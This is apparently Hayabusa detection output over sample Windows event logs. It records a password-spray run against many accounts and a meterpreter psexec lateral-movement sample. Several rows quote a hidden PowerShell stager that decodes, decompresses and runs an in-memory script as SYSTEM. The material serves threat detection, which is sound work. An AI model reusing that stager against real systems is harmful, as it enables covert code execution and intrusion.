Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:38.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:39.954 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:41.028 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:42.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:43.142 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:44.208 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:45.284 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:46.379 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:47.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:48.512 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:49.576 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:50.656 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:51.729 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:52.823 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:53.886 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:54.942 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:56.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:57.107 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:58.193 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:59.253 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:00.320 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:01.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:02.451 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:03.525 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:14 TargetUserName:edygert/jlake/drook/mdouglas/cspizor/cragoso/baker/ssims/jorchilles/bking/smisenar/dmashburn/bgreenwood/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:32:04.597 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:05.675 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target 
Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:06.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:07.835 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:08.911 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:09.973 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:11.051 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:12.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:13.221 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:14.281 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:15.352 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:16.402 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:32:17.474 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,PowerShell as a Service in Registry,,rules/sigma/registry_event/sysmon_powershell_as_service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx 
+2019-05-01 05:26:51.981 +09:00,IEWIN7,13,critical,CobaltStrike Service Installations in Registry,,rules/sigma/registry_event/sysmon_cobaltstrike_service_installs.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:51.981 +09:00,IEWIN7,13,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Curl Start Combination,,rules/sigma/process_creation/win_susp_curl_start_combo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.090 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,informational,Process Creation,"Command: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w 
hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Mimikatz Command Line,,rules/sigma/process_creation/win_mimikatz_command_line.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx +2019-05-01 05:26:52.106 +09:00,IEWIN7,1,high,FromBase64String Command 
